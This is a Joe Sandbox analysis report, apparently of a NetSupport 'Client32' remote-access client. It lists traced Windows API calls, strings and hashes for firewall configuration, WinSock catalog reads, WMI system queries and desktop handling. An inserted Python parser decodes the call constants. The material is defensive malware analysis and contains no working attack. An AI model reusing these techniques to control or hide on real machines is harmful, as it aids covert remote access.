                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                        • API String ID: 3050498177-823534439
                                                                                        • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                        • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                        • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                        • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
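The "APIs" entries on this page list the raw hexadecimal arguments of each call, which hides the parts an analyst most wants to see: the RegOpenKeyExA that reads the PCICTL configuration passes hKey 80000002 (HKEY_LOCAL_MACHINE) with samDesired 00000100 (KEY_WOW64_64KEY, so this 32-bit client deliberately opens the native 64-bit HKLM\SOFTWARE view rather than WOW6432Node, which is where a quick triage of a 32-bit process would otherwise look), the OpenDesktopA in the desktop-switching routine asks for 02000000 (MAXIMUM_ALLOWED), and the WMI CoCreateInstance uses dwClsContext 00000017 (CLSCTX_ALL). The parser below is an added example written for this page, not code from Joe Sandbox or from the analysed sample; it consumes lines in the exact format used above (copied from this section as constructed sample input), splits them into call, module, arguments, subcall and reference address, and decodes the constants from the standard Win32 header values (winreg.h, winuser.h, winnt.h, combaseapi.h), which are assumed to apply to this sample. Decoders are registered per (API, argument index); the tables cover only the calls shown here and can be extended the same way.

```python
"""Parse Joe Sandbox "APIs" entries and decode security-relevant constants.

Added example for this page, not part of the report or the sample.  Constant
tables are standard Win32 values (winreg.h, winuser.h, winnt.h, combaseapi.h);
the sample lines are copied from the function entries on this page.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: "APIs" lines taken verbatim from the entries on this page.
SAMPLE_LINES = [
    r"• RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0",
    r"• OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83",
    r"• CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87",
    r"  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3",
    r"• GetLastError.KERNEL32 ref: 11102CB1",
]

# One report line: optional "Part of subcall function <addr>:" prefix,
# Api.MODULE, optional "(args)", then "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (winreg.h / winnt.h / winuser.h / combaseapi.h).
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_FLAGS = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
             0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
             0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY", 0x00010000: "DELETE",
             0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER"}
DESKTOP_RIGHTS = {0x0001: "DESKTOP_READOBJECTS", 0x0002: "DESKTOP_CREATEWINDOW",
                  0x0004: "DESKTOP_CREATEMENU", 0x0008: "DESKTOP_HOOKCONTROL",
                  0x0010: "DESKTOP_JOURNALRECORD", 0x0020: "DESKTOP_JOURNALPLAYBACK",
                  0x0040: "DESKTOP_ENUMERATE", 0x0080: "DESKTOP_WRITEOBJECTS",
                  0x0100: "DESKTOP_SWITCHDESKTOP", 0x02000000: "MAXIMUM_ALLOWED",
                  0x10000000: "GENERIC_ALL", 0x80000000: "GENERIC_READ"}
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x2: "CLSCTX_INPROC_HANDLER",
          0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}


def decode_enum(table):
    """Exact-value lookup (e.g. a predefined HKEY handle)."""
    return lambda v: table.get(v, f"0x{v:08X}")


def decode_flags(table):
    """Bit-mask decoder; unknown leftover bits are reported in hex."""
    def inner(v):
        names, covered = [], 0
        for bit, name in sorted(table.items()):
            if v & bit == bit:
                names.append(name)
                covered |= bit
        if v & ~covered:
            names.append(f"0x{v & ~covered:X}")
        return "|".join(names) if names else "0"
    return inner


# (API name, zero-based argument index) -> decoder.
DECODERS = {
    ("RegOpenKeyExA", 0): decode_enum(HKEY_NAMES),      # hKey
    ("RegOpenKeyExA", 3): decode_flags(KEY_FLAGS),      # samDesired
    ("OpenDesktopA", 3): decode_flags(DESKTOP_RIGHTS),  # dwDesiredAccess
    ("CoCreateInstance", 2): decode_flags(CLSCTX),      # dwClsContext
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: List[str] = field(default_factory=list)
    subcall: Optional[str] = None
    notes: Dict[int, str] = field(default_factory=dict)  # arg index -> decoded


def parse_call(line: str) -> Optional[ApiCall]:
    """Parse one "APIs" line; returns None for lines that are not calls."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") is not None else []
    call = ApiCall(m.group("api"), m.group("module"), m.group("ref"), args, m.group("sub"))
    for i, a in enumerate(args):
        dec = DECODERS.get((call.api, i))
        # Only 8-hex-digit tokens are DWORD candidates; "?" and strings are left alone.
        if dec and re.fullmatch(r"[0-9A-Fa-f]{8}", a):
            call.notes[i] = dec(int(a, 16))
    return call


def parse_report(lines) -> List[ApiCall]:
    return [c for c in map(parse_call, lines) if c]


def render(call: ApiCall) -> str:
    where = f"{call.api}.{call.module} @ {call.ref}"
    if call.subcall:
        where += f" (subcall of {call.subcall})"
    ann = ", ".join(f"arg{i}={call.args[i]} -> {n}" for i, n in sorted(call.notes.items()))
    return where + (f": {ann}" if ann else "")


if __name__ == "__main__":
    for c in parse_report(SAMPLE_LINES):
        print(render(c))
```

Running the block prints one annotated line per call, for example the RegOpenKeyExA line becomes `arg0=80000002 -> HKEY_LOCAL_MACHINE, arg3=00000100 -> KEY_WOW64_64KEY`. Note that samDesired here carries no KEY_READ bits at all, only the WOW64 view selector, so the key is opened for the 64-bit hive view; when checking a host for this configuration key, read the native HKLM\SOFTWARE path as well as WOW6432Node.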
                                                                                        APIs
                                                                                          • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                          • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                        • _memset.LIBCMT ref: 11145485
                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                        • API String ID: 4251163631-545709139
                                                                                        • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                        • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                        • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                        • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 110150CA
                                                                                        • _memset.LIBCMT ref: 1101510E
                                                                                        • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                        Strings
                                                                                        • %012d, xrefs: 110150C4
                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                        • NSLSP, xrefs: 11015158
                                                                                        • PackedCatalogItem, xrefs: 11015132
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                        • API String ID: 1333399081-1346142259
                                                                                        • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                        • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                        • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                        • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 2427920155-3145022300
                                                                                        • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                        • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                        • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                        • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                        • API String ID: 3494822531-1878648853
                                                                                        • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                        • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                        • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                        • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                        APIs
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                        • std::exception::exception.LIBCMT ref: 11107414
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                        • API String ID: 2851125068-2390547818
                                                                                        • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                        • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                        • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                        • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 1101733C
                                                                                        • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                        • CoUninitialize.COMBASE ref: 110173D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: PCSystemTypeEx$Win32_ComputerSystem
• API String ID: 2407233060-578995875
• Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
• Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
• Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
• Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
APIs
• WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 11017252
• CoInitialize.OLE32(00000000), ref: 1101725B
• _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
• CoUninitialize.COMBASE ref: 110172E0
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: ChassisTypes$Win32_SystemEnclosure
• API String ID: 2407233060-2037925671
• Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
• Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
• Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
• Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
APIs
Strings
• DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
• Client, xrefs: 11138705
• DoICFConfig() OK, xrefs: 11138786
• AutoICFConfig, xrefs: 11138700
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: CountTick
• String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
• API String ID: 536389180-1512301160
• Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
• Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
• Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
• Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
APIs
• CoInitialize.OLE32(00000000), ref: 11096984
• CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
• CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
• CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: CreateFromInitializeInstanceProgUninitialize
• String ID: HNetCfg.FwMgr$ICF Present:
• API String ID: 3222248624-258972079
• Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
• Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
• Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
• Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
APIs
• GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
• K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
• SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorFileImageLastNameProcess
• String ID: GetModuleFileNameExA$GetProcessImageFileNameA
• API String ID: 4186647306-532032230
• Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
• Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
• Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
• Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
• CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
• WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
• CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID: ..\ctl32\Refcount.cpp$hThread
• API String ID: 3360349984-1136101629
• Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
• Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
• Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
• Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %s%s%s.bin$016477$_HF$_HW$_SW
• API String ID: 2111968516-419782183
• Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
• Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
• Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
• Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
APIs
• GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
• GetStockObject.GDI32(00000004), ref: 11102B5B
• RegisterClassA.USER32(?), ref: 11102B6F
• CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                        • String ID: NSMDesktopWnd
                                                                                        • API String ID: 2669163067-206650970
                                                                                        • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                        • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                        • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                        • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                        APIs
                                                                                        • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                        • KillTimer.USER32(00000000,00007F61,TermUI...), ref: 1113CCB3
                                                                                        • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                        • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeKillLibraryTimer
                                                                                        • String ID: TermUI
                                                                                        • API String ID: 2006562601-4085834059
                                                                                        • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                        • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                        • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                        • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                        • API String ID: 47109696-3245241687
                                                                                        • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                        • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
